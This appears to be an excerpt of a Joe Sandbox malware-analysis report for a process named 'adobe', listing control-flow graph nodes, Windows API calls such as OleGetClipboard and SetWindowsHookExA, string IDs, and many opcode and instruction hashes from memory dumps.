                                    • Instruction ID: c064f631aeb97ddba02e79c798b26d2f5460d314177e98b0ee5928f00af307d4
                                    • Opcode Fuzzy Hash: a0273409d9eb205401eb4e4bebff4b84ed1591ad735f64cf3edf2ad57452dabb
                                    • Instruction Fuzzy Hash: 494127B4D00345CFDB94DF99C888AAABBF5FB98314F24C459D559AB321D374A841CFA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2207 6de84cc-6de8528 2208 6de8532-6de8570 OleGetClipboard 2207->2208 2209 6de8579-6de85c7 2208->2209 2210 6de8572-6de8578 2208->2210 2215 6de85c9-6de85cd 2209->2215 2216 6de85d7 2209->2216 2210->2209 2215->2216 2217 6de85cf 2215->2217 2218 6de85d8 2216->2218 2217->2216 2218->2218
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: Clipboard
                                    • String ID:
                                    • API String ID: 220874293-0
                                    • Opcode ID: 71429a63bb7b7551b77f088a29a1818daa51d2a4b41ea21c8dfb4aed7fbd1833
                                    • Instruction ID: 08968326ef0fb0c24e90de9db2e197fe17f875f77760ee41129bbaf570a55ec0
                                    • Opcode Fuzzy Hash: 71429a63bb7b7551b77f088a29a1818daa51d2a4b41ea21c8dfb4aed7fbd1833
                                    • Instruction Fuzzy Hash: 023111B0D01248DFDB10DFA9C984BDEBBF1AB48304F208059E409BB394DBB49845CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2194 6de7e80-6de8570 OleGetClipboard 2197 6de8579-6de85c7 2194->2197 2198 6de8572-6de8578 2194->2198 2203 6de85c9-6de85cd 2197->2203 2204 6de85d7 2197->2204 2198->2197 2203->2204 2205 6de85cf 2203->2205 2206 6de85d8 2204->2206 2205->2204 2206->2206
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: Clipboard
                                    • String ID:
                                    • API String ID: 220874293-0
                                    • Opcode ID: 8f875a43578519a38c342364e6ffc841bff14d7f19970be255512926db2c046a
                                    • Instruction ID: 5247d0bc979759f85a8d7b3925e4e4dab053eefa8103d21901b8ab846c95a1c5
                                    • Opcode Fuzzy Hash: 8f875a43578519a38c342364e6ffc841bff14d7f19970be255512926db2c046a
                                    • Instruction Fuzzy Hash: B6310FB0D01248DFDB50DF99C984B9EBBF5AB48304F208059E405BB2A4DBB5A845CBA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2219 6de68f0-6de68f7 2220 6de68f8-6de698c DuplicateHandle 2219->2220 2221 6de698e-6de6994 2220->2221 2222 6de6995-6de69b2 2220->2222 2221->2222
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE697F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 037ccac8d503d18e19c6991835cbe626b8cc9232ddd4da2f572e17b0650a7b8a
                                    • Instruction ID: 0217b52bb9cab8129b718a14147a7ea54c361d655dedd26970b6bf7ac71b5681
                                    • Opcode Fuzzy Hash: 037ccac8d503d18e19c6991835cbe626b8cc9232ddd4da2f572e17b0650a7b8a
                                    • Instruction Fuzzy Hash: EF21E5B5D002489FDB10CFAAD984ADEBFF9EB48310F14841AE958A7311D374A950CFA5
                                    APIs
                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06DEA0A3
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: HookWindows
                                    • String ID:
                                    • API String ID: 2559412058-0
                                    • Opcode ID: be0da84d95dae47f26631a92dd1764bee57a12d9dae31d395990c0c2b3eee149
                                    • Instruction ID: 2ab4b361cc60662d03845fa2c9b1d699a09c1c7c066b07b9c1ab37863f1492e7
                                    • Opcode Fuzzy Hash: be0da84d95dae47f26631a92dd1764bee57a12d9dae31d395990c0c2b3eee149
                                    • Instruction Fuzzy Hash: E62147B1D00209DFCB14DF9AD844BEEFBF9BB88320F14842AE459A7254C775A944CFA1
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE697F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 7e518df7ea43d6a263b8030a3520a7ced404b73b8a1544e8f5f9861e78a7020e
                                    • Instruction ID: 2abf08efba682db0b816866e4a522698cd39743dcd35666e3c1cc96005a3056e
                                    • Opcode Fuzzy Hash: 7e518df7ea43d6a263b8030a3520a7ced404b73b8a1544e8f5f9861e78a7020e
                                    • Instruction Fuzzy Hash: 3321E4B5D002489FDB10CF9AD984ADEFBF4EB48310F14841AE958A7310D374A940CFA4
                                    APIs
                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06DEA0A3
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: HookWindows
                                    • String ID:
                                    • API String ID: 2559412058-0
                                    • Opcode ID: 84bfa600a501dc8aa3c8e1a3aea7923344501819151a73a4bb2e244ae382d0ad
                                    • Instruction ID: 997de7edd876f77d5f58eb560fe33c2f6e8c6b72771fddaa0175245793fb7f0e
                                    • Opcode Fuzzy Hash: 84bfa600a501dc8aa3c8e1a3aea7923344501819151a73a4bb2e244ae382d0ad
                                    • Instruction Fuzzy Hash: D82124B1D002498FCB14DF9AC944BEEFBF5BB88320F14842AE458A7254C775A940CFA5
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 016CEE7F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4115373441.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_16c0000_adobe.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: e225147027a2a43a2baeb9af82963a280175c6b47798d5371d7421e1c84c91cb
                                    • Instruction ID: 2f6ef8ea0f311a5b73646957768d8c799b53c8aabc5dbdcd2b0fad89e8cfa46b
                                    • Opcode Fuzzy Hash: e225147027a2a43a2baeb9af82963a280175c6b47798d5371d7421e1c84c91cb
                                    • Instruction Fuzzy Hash: 9B11E2B1C006599BCB10DF9AC544BDEFBF4EB48320F15856AD818A7251D378A944CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06DE19B6
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 38198871683d8117f76669ac79e385367b13e461dfc58012e38a8d2bcca5ac96
                                    • Instruction ID: 568496622538f44e2afa946b7f7e3ef4e16e7a085a0c874d542b7abd4f519846
                                    • Opcode Fuzzy Hash: 38198871683d8117f76669ac79e385367b13e461dfc58012e38a8d2bcca5ac96
                                    • Instruction Fuzzy Hash: 32110FB5D002498FDB10DF9AD844BDEFBF4AB88224F14842AD4A9B7310C379A585CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06DE19B6
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 4deafaefe7ed4e2f1b85ccf36a52e0fa9dc486625e6e0e7dc516cf299b555765
                                    • Instruction ID: ebf763cc67c6f7cf666b48705c983142504adda21c18c4649d73fc33c1fe71f2
                                    • Opcode Fuzzy Hash: 4deafaefe7ed4e2f1b85ccf36a52e0fa9dc486625e6e0e7dc516cf299b555765
                                    • Instruction Fuzzy Hash: D011E0B5D006498FCB10DF9AD844BDEFBF4AB88324F14842AD469B7310C379A545CFA5
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06DE7A95), ref: 06DE7B1F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: eb0c577d06ff36daa4c48e9fd3aab7b593d72307081a5bd665dcf4b31203306a
                                    • Instruction ID: 9db9eee3b2f143398d27d90addab43ce37ab4b82911c46f5e4b718cca91e4c0d
                                    • Opcode Fuzzy Hash: eb0c577d06ff36daa4c48e9fd3aab7b593d72307081a5bd665dcf4b31203306a
                                    • Instruction Fuzzy Hash: 141133B1C00248CFCB50DF9AD444BDEBBF4EB48324F208429D559A7300C374A944CFA4
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 06DE83E5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: dff4524b13f88937a96a1c99c68efbe5520e10bd349f3e91ecba5d63faa45100
                                    • Instruction ID: 9e30f58f4159c3b6aae6af7ab9f89213f595e910b37144fdb70583c907ffb5b4
                                    • Opcode Fuzzy Hash: dff4524b13f88937a96a1c99c68efbe5520e10bd349f3e91ecba5d63faa45100
                                    • Instruction Fuzzy Hash: 4B1100B5D043488FCB20DF9AD448BDEBBF4AB48324F20845AE459A7350C779A944CFA5
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 06DE83E5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: 667f7e914b1b233f19208775e7bc39fd4cb5952fa7549e93fc7d6f1d9d83b360
                                    • Instruction ID: f18742d759af971ee6e9ca9349a2f5ee89635fa4fbc948d06a112d42cbfd3d09
                                    • Opcode Fuzzy Hash: 667f7e914b1b233f19208775e7bc39fd4cb5952fa7549e93fc7d6f1d9d83b360
                                    • Instruction Fuzzy Hash: 391100B1D043488FCB20DF9AD848BDEBBF4EB48324F208459E559A7310C378A944CFA5
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06DE7A95), ref: 06DE7B1F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: eb7adef13b7c1a15cab04204942d74a9ce41cbd723f7ce1118f78b4b39fc658c
                                    • Instruction ID: c2d973ebc2ed876f1edb0af54f9d5d6774f31d47b9ca59bed6d467d5054f1a6e
                                    • Opcode Fuzzy Hash: eb7adef13b7c1a15cab04204942d74a9ce41cbd723f7ce1118f78b4b39fc658c
                                    • Instruction Fuzzy Hash: 9411F2B5C042498FCB50DF9AD845BDEBBF4AB48324F208429E558A7250C774A984CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XPpq
                                    • API String ID: 0-1266478781
                                    • Opcode ID: 98563519758aa66fec5f02cc13679b5135ff2e3bbe27ec237d7e7f5043874f1f
                                    • Instruction ID: 6be73ff591bd11b91d3f70e637b60cc896427812743387cc547903334b401f06
                                    • Opcode Fuzzy Hash: 98563519758aa66fec5f02cc13679b5135ff2e3bbe27ec237d7e7f5043874f1f
                                    • Instruction Fuzzy Hash: D0416F70F102189FDB54DBA9C854BAFBAF7FF88300F208529E105AB3A5DA759C45CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: eecb6021b066af4543186dc2fb3d8df6926dcf438674b998939bc2cc672e9d49
                                    • Instruction ID: f516e6bcae69a90867268e18e42fa04605c02f7a14eceaa8bd01bf2c8d9564f0
                                    • Opcode Fuzzy Hash: eecb6021b066af4543186dc2fb3d8df6926dcf438674b998939bc2cc672e9d49
                                    • Instruction Fuzzy Hash: C441E170E202099FDB61DF65C58469EBBB7FF85344F218829E506EB244DB74D886CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: 9fe9a230150f24b0f53261b3a9975faf9004efbfafcb3bcfdef079dd10695c15
                                    • Instruction ID: 1fbcb5b4cedacfd9c07c96e5621ad290d200cd969ada5c394f323d2e4e985de9
                                    • Opcode Fuzzy Hash: 9fe9a230150f24b0f53261b3a9975faf9004efbfafcb3bcfdef079dd10695c15
                                    • Instruction Fuzzy Hash: 6941E170E203059FDB61CF65D58469EBBB6FF86344F214929E502EB240DB74E882CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: ac954e2743f7afaa2387815b7989432277049a78b284bb456fe13df0c4c4c068
                                    • Instruction ID: 177ba688d73e3f6062474c1f96b685f06a919e1cc1fc1c3cc3d57551e75487bb
                                    • Opcode Fuzzy Hash: ac954e2743f7afaa2387815b7989432277049a78b284bb456fe13df0c4c4c068
                                    • Instruction Fuzzy Hash: EB313130B102018FDB659BB4D61866F7BE6AF8A300F29846CD106DB3A5DF36DD41CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: d341578d82ba2624d5693808e51ef958d174ab927542d34c291f2cddb7929e35
                                    • Instruction ID: 497ab8030677f00938a9c3256b9c9e127f44fe344c91d99838516906d0e0f305
                                    • Opcode Fuzzy Hash: d341578d82ba2624d5693808e51ef958d174ab927542d34c291f2cddb7929e35
                                    • Instruction Fuzzy Hash: C631FE70B102018FDB659BB4D61466F7BE6BF89304F258428D506DB398DE36DD41C791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |
                                    • API String ID: 0-2343686810
                                    • Opcode ID: 040e77bb05970f5a4625b5548eb928890c5f83e989051c23fd668bc36472137c
                                    • Instruction ID: ca76044126e63299d1ee8f462c8b0fc727bb3d48ff0ad957b4075a6edf85ab51
                                    • Opcode Fuzzy Hash: 040e77bb05970f5a4625b5548eb928890c5f83e989051c23fd668bc36472137c
                                    • Instruction Fuzzy Hash: 6F115C75F102149FDB949F78C808B5E77F5AF48750F10846AE94AEB3A0DB359900CB84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |
                                    • API String ID: 0-2343686810
                                    • Opcode ID: 5b593f912d93255a3cb46632d714fbbf7ed9ebbf4dea0b294e0f4c77126293e1
                                    • Instruction ID: 6390cd318fcf09718297057ca92ac0ee4c974b626e28b3a40c6899a086033de8
                                    • Opcode Fuzzy Hash: 5b593f912d93255a3cb46632d714fbbf7ed9ebbf4dea0b294e0f4c77126293e1
                                    • Instruction Fuzzy Hash: 7E115E75B50225DFDB84DB78C804B6E77F5AF48750F10846AE64AEB3A0DB799900CB84
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 753a2ee39314ca0bd426d9872ada19fad30373eb188a82a28a5a89c7cac37374
                                    • Instruction ID: 03fa0ac02408b5dce7744370296e55ac80d892199adada9652bf52e10f0a1f7c
                                    • Opcode Fuzzy Hash: 753a2ee39314ca0bd426d9872ada19fad30373eb188a82a28a5a89c7cac37374
                                    • Instruction Fuzzy Hash: 70A1A734F202098FEF64DBACD5907BEB7B6EB89310F258826E505E7395CA39DC818751
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb34d75d2e4494ba2c0efa4e87df66166f4c19180179e5d2ed8e9a337220df9c
                                    • Instruction ID: eee75d72ec20b921202235fa378a0b7a8e4bad5dd0476f0800e5bf31d9855994
                                    • Opcode Fuzzy Hash: bb34d75d2e4494ba2c0efa4e87df66166f4c19180179e5d2ed8e9a337220df9c
                                    • Instruction Fuzzy Hash: CF81E271F20105DFDF649BB8E8947ADB7A6EB84311F21482AE20ADB354DB35CC45CB91
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 950c2445689c16af9a1831297b79a79865a1125972d0c176ff4158a5c1f80230
                                    • Instruction ID: 8d5a1b1265f12e80ceed1d01f0a072749a12d86ffdaccee115b221680480654c
                                    • Opcode Fuzzy Hash: 950c2445689c16af9a1831297b79a79865a1125972d0c176ff4158a5c1f80230
                                    • Instruction Fuzzy Hash: 8361D1B2F101214FCF149B7EC88066EBAEBAF94610B154439E90ADB379DEA5DC0287C1
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd3ed9698333878f50f1846c41a35ca553ea446c9663261bbaa7954aa707630c
                                    • Instruction ID: 26e3424cca75c1fedba0e0a644db36563dcac5db7974d9b36f23f7a1a3411f74
                                    • Opcode Fuzzy Hash: dd3ed9698333878f50f1846c41a35ca553ea446c9663261bbaa7954aa707630c
                                    • Instruction Fuzzy Hash: 0D814B30B102098BDF54DFA8D5946AEB7F6EF89300F118429D50ADB395EA75DC428B81
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0023ddb2fc12755338038911681892e318d395aa5fb6818290e5087cf2299994
                                    • Instruction ID: 9dcd0a917ab4911b326fcec181c13da5f7ed0e182a00feffd2646aaa6187e19e
                                    • Opcode Fuzzy Hash: 0023ddb2fc12755338038911681892e318d395aa5fb6818290e5087cf2299994
                                    • Instruction Fuzzy Hash: E5913D34E106198FDF60DF68C890B9EB7B1FF89310F208599D549AB395DB70AA85CF90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5d1421ff85128229270e6028bf678502f24a67daf67b97d0de7109ca65651862
                                    • Instruction ID: 7a576befde2b7b3efdfd5cc65b2786d681ea6eee1644ffb450f25bae9f977a28
                                    • Opcode Fuzzy Hash: 5d1421ff85128229270e6028bf678502f24a67daf67b97d0de7109ca65651862
                                    • Instruction Fuzzy Hash: D8814C30B102098BDF54DFA9D5547AFB7F6AF89300F118429D50ADB395EB75DC428B41
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59fc73a8cdb110e51d7a0f95a0bac00c6aa87f20cb650893481b5279d8acabfe
                                    • Instruction ID: 0110ee9630563b952bdad51aa96540f75c732cd5367d26f73a7a00cdeb3093d1
                                    • Opcode Fuzzy Hash: 59fc73a8cdb110e51d7a0f95a0bac00c6aa87f20cb650893481b5279d8acabfe
                                    • Instruction Fuzzy Hash: FC911E34E1061A8FDF60DF68C890B9EB7B1FF89310F208599D549AB395DB70A985CF90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 89db8de360c692d5c724d9a3e2175d96be5878be95d23fb07fa6ba4733957222
                                    • Instruction ID: 9855ed725a5daaef3e44b6c1f69462ce8b62888c11d2cd8c61dacc38dbf36271
                                    • Opcode Fuzzy Hash: 89db8de360c692d5c724d9a3e2175d96be5878be95d23fb07fa6ba4733957222
                                    • Instruction Fuzzy Hash: 87714B70A102099FDB54DFA9D980AAEBBF6FF84300F258429D505EB365DB70EC46CB50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2962eba04b2dcd868fffc46c9bf4020a5c3f74e941196bc3e12c2eccf40961a1
                                    • Instruction ID: d53cae0aaf56d823e76cd951779edae742696a60ebf47dc40329cf6b4618ecfd
                                    • Opcode Fuzzy Hash: 2962eba04b2dcd868fffc46c9bf4020a5c3f74e941196bc3e12c2eccf40961a1
                                    • Instruction Fuzzy Hash: 1D712A70A102099FDB54DFA9D980AAEBBF6FF84304F258429D505EB365DB70EC46CB50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba34d04574971888572e672e93040b4fd923624b1ea3c3ff0f9c05d530e49230
                                    • Instruction ID: 05f48b3c1daac9c4761c61f43055e024d7a15c75573766b8e1b36b23d1f9e4f9
                                    • Opcode Fuzzy Hash: ba34d04574971888572e672e93040b4fd923624b1ea3c3ff0f9c05d530e49230
                                    • Instruction Fuzzy Hash: 26510670B20214DFEF645B6CD95472F3A9ED789340F21482BE20AD73E8D969CC8547A2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f618ac178135be8e427bca11c07a13acd414e53fedd4a2903b46b279fdd4aef
                                    • Instruction ID: 95abc553eefd8629d51a545f0bfa941f0931f362cd92d0b92d5514f9279f7fe7
                                    • Opcode Fuzzy Hash: 0f618ac178135be8e427bca11c07a13acd414e53fedd4a2903b46b279fdd4aef
                                    • Instruction Fuzzy Hash: 7451D470B20214DFEF645B6CE95872F369ED789350F21482BE20AD73E8D969CC8547A2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f69ce6040c6f9c09200f3cdb1da16e934056fc2d5e52f5b7f9cef95bafd39ee3
                                    • Instruction ID: 07235c3df110c24ec792ca7712bb966f643c65b6216d22388125a2aa1dd31913
                                    • Opcode Fuzzy Hash: f69ce6040c6f9c09200f3cdb1da16e934056fc2d5e52f5b7f9cef95bafd39ee3
                                    • Instruction Fuzzy Hash: DF413A71E106099BDF70CFA9E880AAFFBF6FB98310F11492AD256D7650D330E8558B90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8ed8a1a0aac106bf94579aae2e246c101d8b941464c02ee55208a07f1e2548c5
                                    • Instruction ID: 1683580ca60475fab09ff027cefd3185b42dbee1be2bafb0d2146d93b04d93d9
                                    • Opcode Fuzzy Hash: 8ed8a1a0aac106bf94579aae2e246c101d8b941464c02ee55208a07f1e2548c5
                                    • Instruction Fuzzy Hash: 0631A031E202159BCB58CFA5D99469EB7F2FF89300F118529EA06EB350DB71ED42CB90
                                    Memory Dump Source
